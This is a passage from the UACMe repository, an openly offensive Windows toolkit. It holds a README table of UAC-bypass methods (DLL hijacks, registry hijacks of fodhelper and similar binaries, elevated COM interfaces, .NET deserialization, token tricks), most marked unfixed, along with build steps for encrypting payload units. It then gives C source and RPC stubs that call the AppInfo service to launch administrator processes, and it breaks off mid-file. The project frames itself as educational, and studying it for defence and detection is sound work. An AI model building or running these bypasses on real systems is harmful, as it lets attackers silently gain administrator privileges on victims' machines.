Author: Arush Agarampur\n     * Type: Shell API\n     * Method: Environment variables expansion, Dll Hijack\n     * Target(s): \\system32\\taskhostw.exe\n     * Component(s): pcadm.dll\n     * Implementation: ucmPcaMethod\n     * Works from: Windows 7 (7600)\n     * AlwaysNotify compatible\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.5.6\n70. Author: V3ded\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\fodhelper.exe, \\system32\\computerdefaults.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmShellRegModMethod3\n     * Works from: Windows 10 (10240)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.5.7\n71. Author: Arush Agarampur\n     * Type: Dll Hijack\n     * Method: ISecurityEditor\n     * Target(s): Native Image Cache elements\n     * Component(s): Attacker defined\n     * Implementation: ucmNICPoisonMethod2\n     * Works from: Windows 7 RTM (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.5.8\n72. Author: Emeric Nasi\n     * Type: Dll Hijack\n     * Method: Dll path search abuse\n     * Target(s): \\syswow64\\msdt.exe, \\system32\\sdiagnhost.exe\n     * Component(s): BluetoothDiagnosticUtil.dll\n     * Implementation: ucmMsdtMethod\n     * Works from: Windows 10 (10240)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.5.9\n73. Author: orange_8361 and antonioCoco\n     * Type: Shell API\n     * Method: .NET deserialization\n     * Target(s): \\system32\\mmc.exe EventVwr.msc\n     * Component(s): Attacker defined\n     * Implementation: ucmDotNetSerialMethod\n     * Works from: Windows 7 RTM (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.6.0\n74. 
Author: zcgonvh\n     * Type: Elevated COM interface\n     * Method: IElevatedFactoryServer\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmVFServerTaskSchedMethod\n     * Works from: Windows 8.1 (9600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.6.1\n75. Author: zcgonvh derivative by Wh04m1001\n     * Type: Elevated COM interface\n     * Method: IDiagnosticProfile\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmVFServerDiagProfileMethod\n     * Works from: Windows 7 RTM (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.6.2\n76. Author: HackerHouse\n     * Type: Dll Hijack\n     * Method: Dll path search abuse, Registry key manipulation\n     * Target(s): \\syswow64\\iscsicpl.exe\n     * Component(s): iscsiexe.dll\n     * Implementation: ucmIscsiCplMethod\n     * Works from: Windows 7 RTM (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.6.3\n77. Author: Arush Agarampur\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\mmc.exe\n     * Component(s): atl.dll\n     * Implementation: ucmAtlHijackMethod\n     * Works from: Windows 7 RTM (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.6.4\n78. Author: antonioCoco\n     * Type: Impersonation\n     * Method: SSPI Datagram\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmSspiDatagramMethod\n     * Works from: Windows 7 RTM (7600)\n     * AlwaysNotify compatible\n     * Fixed in: Windows 10 (19041), a part of patch, 2024? year\n        * How: Side effect of Windows changes\n      * Code status: added in v3.6.5\n79. 
Author: James Forshaw and Stefan Kanthak\n     * Type: GUI Hack\n     * Method: UIPI bypass with token modification\n     * Target(s): \\system32\\osk.exe, \\system32\\mmc.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmTokenModUIAccessMethod2\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS5 (17763), a part of patch, 2024 year\n        * How: When integrity level of an UIAccess token is lowered, the UIAccess property is removed\n      * Code status: added in v3.6.6\n80. Author: R41N3RZUF477\n     * Type: Shell API\n     * Method: Environment variables expansion, Dll Hijack\n     * Target(s): \\system32\\taskhostw.exe\n     * Component(s): PerformanceTraceHandler.dll\n     * Implementation: ucmRequestTraceMethod\n     * Works from: Windows 11 (26100)\n     * AlwaysNotify compatible\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.6.7\n81. Author: R41N3RZUF477\n     * Type: Shell API\n     * Method: Environment variables expansion, Dll Hijack, UIPI bypass\n     * Target(s): \\system32\\QuickAssist.exe\n     * Component(s): EmbeddedBrowserWebView.dll\n     * Implementation: ucmQuickAssistMethod\n     * Works from: Windows 10 (19041)\n     * AlwaysNotify compatible\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.6.8\n\n</details>\n\n**Important Notes:**\n* Method 30, 63 and later are implemented only in x64 version\n* Method 30 requires x64 because it exploits WOW64 subsystem feature\n* Method 55 is included primarily for educational purposes and may not be reliable\n* Method 78 requires that the current user account password is not blank\n\n## Warning\n\n⚠️ **Important Security and Usage Information**:\n\n* This tool demonstrates **only publicly known UAC bypass methods** used by malware. 
It reimplements some techniques in different ways to improve upon original concepts.\n* **Not intended for antivirus testing** and not guaranteed to work in environments with aggressive security software. Use with active antivirus at your own risk.\n* Many antivirus solutions may flag this tool as a \"HackTool\" - this is expected behavior due to its capabilities.\n* **Clean up after usage**: If running on a production system, ensure you remove all program artifacts afterward. See source code for details about files dropped to system folders.\n* Most methods were developed primarily for x64 systems. While many can work on x86-32 with minor adjustments, 32-bit support is not a focus of this project.\n* For an official Microsoft explanation on why UAC bypasses still exist, see: [Microsoft's stance on UAC](https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105)\n\n# Windows 10 support and testing policy\n* UACMe is tested only with LTSB/LTSC variants (1607/1809) and the current RTM-1 versions\n* For example: if the current version is 2004, it will be tested on 2004 (19041) and the previous 1909 (18363)\n* Insider builds are not supported as methods may be fixed in preview releases\n\n# Protection Measures\nThe most effective protection against UAC bypass techniques is using an account without administrative privileges.\n\n# Build instructions\n\nUACMe is written in C and requires Microsoft Visual Studio 2019 or later to build from source.\n\n### Prerequisites\n* **IDE**: Microsoft Visual Studio 2019 or 2022\n* **SDK Requirements**:\n  * Windows 8.1 or Windows 10 SDK (tested with 19041 version)\n  * .NET Framework SDK (tested with 4.8 version)\n\n### Build Steps\n\n1. **Configure Platform ToolSet** (Project->Properties->General):\n   * For Visual Studio 2019: Select v142\n   * For Visual Studio 2022: Select v143\n\n2. 
**Set Target Platform Version** (Project->Properties->General):\n   * For v140: Select 8.1 (Windows 8.1 SDK must be installed)\n   * For v141 and above: Select 10\n\n3. **Build Process**:\n   * Compile payload units\n   * Compile Naka module\n   * Encrypt all payload units using Naka module\n   * Generate secret blobs for these units using Naka module\n   * Move compiled units and secret blobs to the Akagi\\Bin directory\n   * Rebuild Akagi\n\n> **Note**: Compiled binaries are not provided and will never be provided. This serves as a barrier against malicious usage and helps maintain the educational purpose of this project.\n\n## Legal Disclaimer\n\n* This tool is provided for **educational and research purposes only**\n* We do not take any responsibility for this tool being used in malicious activities\n* We have no affiliation with any \"security company\" using this code for commercial activities\n* This GitHub repository (hfiref0x/UACME) is the only genuine source for UACMe code\n\n# Support\n\nIf you find this project interesting, you can buy me a coffee\n\nBTC (Bitcoin): bc1qzkvtpa0053cagf35dqmpvv9k8hyrwl7krwdz84q39mcpy68y6tmqsju0g4\n  \n# References\n\n* Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html\n* Malicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf\n* Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/\n* Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog\n* KernelMode.Info UACMe thread, https://www.kernelmode.info/forum/viewtopicf985.html?f=11&t=3643\n* Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited\n* \"Fileless\" UAC Bypass Using eventvwr.exe and Registry Hijacking, 
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n* Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n* Using IARPUninstallStringLauncher COM interface to bypass UAC, http://www.freebuf.com/articles/system/116611.html\n* Bypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/\n* \"Fileless\" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n* UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/\n* Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html\n* First entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n* Reading Your Way Around UAC in 3 parts:\n   1. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html\n   2. https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html\n   3. 
https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html \n* Research on CMSTP.exe, https://msitpros.com/?p=3960\n* UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.html\n* UAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n* Yet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\n* UAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/\n* Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.html\n* Fileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.html\n* Calling Local Windows RPC Servers from .NET, https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html\n* Microsoft Windows 10 UAC bypass local privilege escalation exploit, https://packetstormsecurity.com/files/155927/Microsoft-Windows-10-Local-Privilege-Escalation.html\n* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html\n* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html\n* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses\n* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass\n* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944\n* Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html\n* Bypassing UAC 
with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html\n* Mitigate some Exploits for Windows’® UAC, https://skanthak.hier-im-netz.de/uacamole.html\n\n# Authors\n\n(c) 2014 - 2026 UACMe Project\n"
  },
  {
    "path": "Source/Akagi/aic.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2026\n*\n*  TITLE:       AIC.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n#ifdef _WIN64\n#include \"appinfo/x64/appinfo64.h\"\n#else\n#include \"appinfo/x86-32/appinfo32.h\"\n#endif\n\n/*\n* AicpAsyncInitializeHandle\n*\n* Purpose:\n*\n* Init RPC_ASYNC_STATE structure.\n*\n*/\nRPC_STATUS AicpAsyncInitializeHandle(\n    _Inout_ RPC_ASYNC_STATE* AsyncState)\n{\n    RPC_STATUS status;\n\n    status = RpcAsyncInitializeHandle(AsyncState, sizeof(RPC_ASYNC_STATE));\n    if (status == RPC_S_OK) {\n        AsyncState->NotificationType = RpcNotificationTypeEvent;\n        AsyncState->u.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);\n        if (AsyncState->u.hEvent == NULL)\n            status = GetLastError();\n    }\n\n    return status;\n}\n\n/*\n* AicpAsyncCloseHandle\n*\n* Purpose:\n*\n* Close RPC_ASYNC_STATE notification event.\n*\n*/\nVOID AicpAsyncCloseHandle(\n    _Inout_ RPC_ASYNC_STATE* AsyncState)\n{\n    if (AsyncState->u.hEvent) {\n        CloseHandle(AsyncState->u.hEvent);\n        AsyncState->u.hEvent = NULL;\n    }\n}\n\n/*\n* AicLaunchAdminProcess\n*\n* Purpose:\n*\n* Create process by talking to APPINFO via RPC.\n*\n*/\nBOOLEAN AicLaunchAdminProcess(\n    _In_opt_ LPWSTR ExecutablePath,\n    _In_opt_ LPWSTR CommandLine,\n    _In_ DWORD StartFlags,\n    _In_ DWORD CreationFlags,\n    _In_ LPWSTR CurrentDirectory,\n    _In_ LPWSTR WindowStation,\n    _In_opt_ HWND hWnd,\n    _In_ DWORD Timeout,\n    _In_ DWORD ShowFlags,\n    _Out_ PROCESS_INFORMATION* 
ProcessInformation\n)\n{\n    BOOLEAN bResult = FALSE;\n    RPC_BINDING_HANDLE rpcHandle;\n    RPC_ASYNC_STATE asyncState;\n    APP_PROCESS_INFORMATION procInfo;\n    APP_STARTUP_INFO appStartup;\n    RPC_STATUS status;\n    VOID* Reply = NULL;\n\n    LONG elevationType = 0;\n\n    if (ProcessInformation) {\n        ProcessInformation->hProcess = NULL;\n        ProcessInformation->hThread = NULL;\n        ProcessInformation->dwProcessId = 0;\n        ProcessInformation->dwThreadId = 0;\n    }\n\n    RtlSecureZeroMemory(&procInfo, sizeof(procInfo));\n    RtlSecureZeroMemory(&appStartup, sizeof(appStartup));\n\n    appStartup.dwFlags = STARTF_USESHOWWINDOW;\n    appStartup.wShowWindow = (SHORT)ShowFlags;\n\n    RtlSecureZeroMemory(&asyncState, sizeof(RPC_ASYNC_STATE));\n\n    if ((supCreateBindingHandle(APPINFO_RPC, &rpcHandle) == RPC_S_OK) &&\n        (AicpAsyncInitializeHandle(&asyncState) == RPC_S_OK))\n    {\n\n        __try {\n\n            RAiLaunchAdminProcess(&asyncState,\n                rpcHandle,\n                ExecutablePath,\n                CommandLine,\n                StartFlags,\n                CreationFlags,\n                CurrentDirectory,\n                WindowStation,\n                &appStartup,\n                (ULONG_PTR)hWnd,\n                Timeout,\n                &procInfo,\n                &elevationType);\n\n            if (WaitForSingleObject(asyncState.u.hEvent, INFINITE) == WAIT_FAILED)\n            {\n                RpcRaiseException(-1);\n            }\n\n            status = RpcAsyncCompleteCall(&asyncState, &Reply);\n            if (status == 0 && Reply == NULL) {\n\n                if (ProcessInformation) {\n                    ProcessInformation->hProcess = (HANDLE)procInfo.ProcessHandle;\n                    ProcessInformation->hThread = (HANDLE)procInfo.ThreadHandle;\n                    ProcessInformation->dwProcessId = (DWORD)procInfo.ProcessId;\n                    ProcessInformation->dwThreadId = 
(DWORD)procInfo.ThreadId;\n                }\n\n                bResult = TRUE;\n\n            }\n\n            AicpAsyncCloseHandle(&asyncState);\n\n        }\n        __except (EXCEPTION_EXECUTE_HANDLER) {\n            AicpAsyncCloseHandle(&asyncState);\n            RpcBindingFree(&rpcHandle);\n            SetLastError(RpcExceptionCode());\n            return FALSE;\n        }\n\n        RpcBindingFree(&rpcHandle);\n    }\n\n    return bResult;\n}\n"
  },
  {
    "path": "Source/Akagi/aic.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2020\n*\n*  TITLE:       AIC.H\n*\n*  VERSION:     3.23\n*\n*  DATE:        17 Dec 2019\n*\n*  Common header file for the AppInfo routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef ULONG ELEVATION_REASON;\n\nBOOLEAN AicLaunchAdminProcess(\n    _In_opt_ LPWSTR ExecutablePath,\n    _In_opt_ LPWSTR CommandLine,\n    _In_ DWORD StartFlags,\n    _In_ DWORD CreationFlags,\n    _In_ LPWSTR CurrentDirectory,\n    _In_ LPWSTR WindowStation,\n    _In_opt_ HWND hWnd,\n    _In_ DWORD Timeout,\n    _In_ DWORD ShowFlags,\n    _Out_ PROCESS_INFORMATION* ProcessInformation);\n"
  },
  {
    "path": "Source/Akagi/akagi.manifest",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<assembly manifestVersion=\"1.0\" xmlns=\"urn:schemas-microsoft-com:asm.v1\" xmlns:asmv3=\"urn:schemas-microsoft-com:asm.v3\">\n    <assemblyIdentity \n        type=\"win32\" \n        name=\"Akagi\"\n        version=\"1.0.0.0\"\n        processorArchitecture=\"*\"\n    />\n    <description>Akagi was an aircraft carrier of the Imperial Japanese Navy (IJN), named after Mount Akagi in present-day Gunma Prefecture.</description>\n    <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\n        <security>\n            <requestedPrivileges>\n                <requestedExecutionLevel\n                    level=\"asInvoker\"\n                    uiAccess=\"false\"\n                />\t\n            </requestedPrivileges>\n        </security>\n    </trustInfo>  \n  <dependency>\n    <dependentAssembly>\n      <assemblyIdentity                 \n        type=\"win32\"\n        name=\"Microsoft.Windows.Common-Controls\"\n        version=\"6.0.0.0\"\n        publicKeyToken=\"6595b64144ccf1df\"\n        language=\"*\"\n        processorArchitecture=\"*\"\n        />\n    </dependentAssembly>\n  </dependency>\n\n</assembly>"
  },
  {
    "path": "Source/Akagi/appinfo/appinfo.acf",
    "content": "interface LaunchAdminProcess\n{\t\n\t[async] RAiLaunchAdminProcess();\n}"
  },
  {
    "path": "Source/Akagi/appinfo/appinfo.idl",
    "content": "import \"oaidl.idl\";\nimport \"ocidl.idl\";\n\n[\nuuid(201ef99a-7fa0-444c-9399-19ba84f12a1a),\nversion(1.0),\n]\ninterface LaunchAdminProcess\n{\n\n\ttypedef struct _MONITOR_POINT {\n\t\tlong MonitorLeft;\n\t\tlong MonitorRight;\n\t} MONITOR_POINT;\n\n\ttypedef struct _APP_STARTUP_INFO {\n\t\twchar_t* lpszTitle;\n\t\tlong dwX;\n\t\tlong dwY;\n\t\tlong dwXSize;\n\t\tlong dwYSize;\n\t\tlong dwXCountChars;\n\t\tlong dwYCountChars;\n\t\tlong dwFillAttribute;\n\t\tlong dwFlags;\n\t\tshort wShowWindow;\n\t\tstruct _MONITOR_POINT MonitorPoint;\n\t} APP_STARTUP_INFO;\n\n\ttypedef struct _APP_PROCESS_INFORMATION {\n\t\tunsigned __int3264 ProcessHandle;\n\t\tunsigned __int3264 ThreadHandle;\n\t\tlong  ProcessId;\n\t\tlong  ThreadId;\n\t} APP_PROCESS_INFORMATION;\n\n\tlong RAiLaunchAdminProcess(\n\t\thandle_t hBinding,\n\t\t[in][unique][string] wchar_t* ExecutablePath,\n\t\t[in][unique][string] wchar_t* CommandLine,\n\t\t[in]long StartFlags,\n\t\t[in]long CreationFlags,\n\t\t[in][string] wchar_t* CurrentDirectory,\n\t\t[in][string] wchar_t* WindowStation,\n\t\t[in]struct _APP_STARTUP_INFO* StartupInfo,\n\t\t[in]unsigned __int3264 hWnd,\n\t\t[in]long Timeout,\n\t\t[out]struct _APP_PROCESS_INFORMATION* ProcessInformation,\n\t\t[out]long* ElevationType);\n\n}"
  },
  {
    "path": "Source/Akagi/appinfo/x64/appinfo64.c",
    "content": "\n\n/* this ALWAYS GENERATED file contains the RPC client stubs */\n\n\n /* File created by MIDL compiler version 8.01.0622 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for appinfo.idl:\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#if defined(_M_AMD64)\n\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 )  /* redefine extern to static */\n#pragma warning( disable: 4232 )  /* dllimport identity*/\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\n\n#include \"appinfo64.h\"\n\n#define TYPE_FORMAT_STRING_SIZE   75                                \n#define PROC_FORMAT_STRING_SIZE   103                               \n#define EXPR_FORMAT_STRING_SIZE   1                                 \n#define TRANSMIT_AS_TABLE_SIZE    0            \n#define WIRE_MARSHAL_TABLE_SIZE   0            \n\ntypedef struct _appinfo_MIDL_TYPE_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\n    } appinfo_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_PROC_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\n    } appinfo_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _appinfo_MIDL_EXPR_FORMAT_STRING\n    {\n    long          Pad;\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\n    } appinfo_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\n\nextern const appinfo_MIDL_TYPE_FORMAT_STRING 
appinfo__MIDL_TypeFormatString;\nextern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString;\nextern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE   0            \n\n\n/* Standard interface: LaunchAdminProcess, ver. 1.0,\n   GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface =\n    {\n    sizeof(RPC_CLIENT_INTERFACE),\n    {{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}},\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n    0,\n    0,\n    0,\n    0,\n    0,\n    0x00000000\n    };\nRPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface;\n\nextern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc;\n\nstatic RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle;\n\n\n/* [async] */ void  RAiLaunchAdminProcess( \n    /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,\n    handle_t hBinding,\n    /* [string][unique][in] */ wchar_t *ExecutablePath,\n    /* [string][unique][in] */ wchar_t *CommandLine,\n    /* [in] */ long StartFlags,\n    /* [in] */ long CreationFlags,\n    /* [string][in] */ wchar_t *CurrentDirectory,\n    /* [string][in] */ wchar_t *WindowStation,\n    /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,\n    /* [in] */ unsigned __int3264 hWnd,\n    /* [in] */ long Timeout,\n    /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,\n    /* [out] */ long *ElevationType)\n{\n\n    NdrAsyncClientCall(\n                      ( PMIDL_STUB_DESC  )&LaunchAdminProcess_StubDesc,\n                      (PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0],\n                      RAiLaunchAdminProcess_AsyncHandle,\n                      hBinding,\n                      ExecutablePath,\n                      CommandLine,\n                   
   StartFlags,\n                      CreationFlags,\n                      CurrentDirectory,\n                      WindowStation,\n                      StartupInfo,\n                      hWnd,\n                      Timeout,\n                      ProcessInformation,\n                      ElevationType);\n    \n}\n\n\n#if !defined(__RPC_WIN64__)\n#error  Invalid build platform for this stub.\n#endif\n\nstatic const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString =\n    {\n        0,\n        {\n\n\t/* Procedure RAiLaunchAdminProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags:  */\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  8 */\tNdrFcShort( 0x70 ),\t/* X64 Stack size/offset = 112 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\n/* 14 */\tNdrFcShort( 0x20 ),\t/* 32 */\n/* 16 */\tNdrFcShort( 0x24 ),\t/* 36 */\n/* 18 */\t0xc7,\t\t/* Oi2 Flags:  srv must size, clt must size, has return, has ext, has async handle */\n\t\t\t0xc,\t\t/* 12 */\n/* 20 */\t0xa,\t\t/* 10 */\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter ExecutablePath */\n\n/* 30 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 32 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\n/* 34 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter CommandLine */\n\n/* 36 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 38 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\n/* 40 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter StartFlags */\n\n/* 42 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 44 */\tNdrFcShort( 0x20 ),\t/* X64 Stack size/offset = 32 */\n/* 46 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 
*/\n\n\t/* Parameter CreationFlags */\n\n/* 48 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 50 */\tNdrFcShort( 0x28 ),\t/* X64 Stack size/offset = 40 */\n/* 52 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter CurrentDirectory */\n\n/* 54 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\n/* 56 */\tNdrFcShort( 0x30 ),\t/* X64 Stack size/offset = 48 */\n/* 58 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter WindowStation */\n\n/* 60 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\n/* 62 */\tNdrFcShort( 0x38 ),\t/* X64 Stack size/offset = 56 */\n/* 64 */\tNdrFcShort( 0x8 ),\t/* Type Offset=8 */\n\n\t/* Parameter StartupInfo */\n\n/* 66 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\n/* 68 */\tNdrFcShort( 0x40 ),\t/* X64 Stack size/offset = 64 */\n/* 70 */\tNdrFcShort( 0x16 ),\t/* Type Offset=22 */\n\n\t/* Parameter hWnd */\n\n/* 72 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 74 */\tNdrFcShort( 0x48 ),\t/* X64 Stack size/offset = 72 */\n/* 76 */\t0xb9,\t\t/* FC_UINT3264 */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter Timeout */\n\n/* 78 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 80 */\tNdrFcShort( 0x50 ),\t/* X64 Stack size/offset = 80 */\n/* 82 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter ProcessInformation */\n\n/* 84 */\tNdrFcShort( 0x6113 ),\t/* Flags:  must size, must free, out, simple ref, srv alloc size=24 */\n/* 86 */\tNdrFcShort( 0x58 ),\t/* X64 Stack size/offset = 88 */\n/* 88 */\tNdrFcShort( 0x38 ),\t/* Type Offset=56 */\n\n\t/* Parameter ElevationType */\n\n/* 90 */\tNdrFcShort( 0x2150 ),\t/* Flags:  out, base type, simple ref, srv alloc size=8 */\n/* 92 */\tNdrFcShort( 0x60 ),\t/* X64 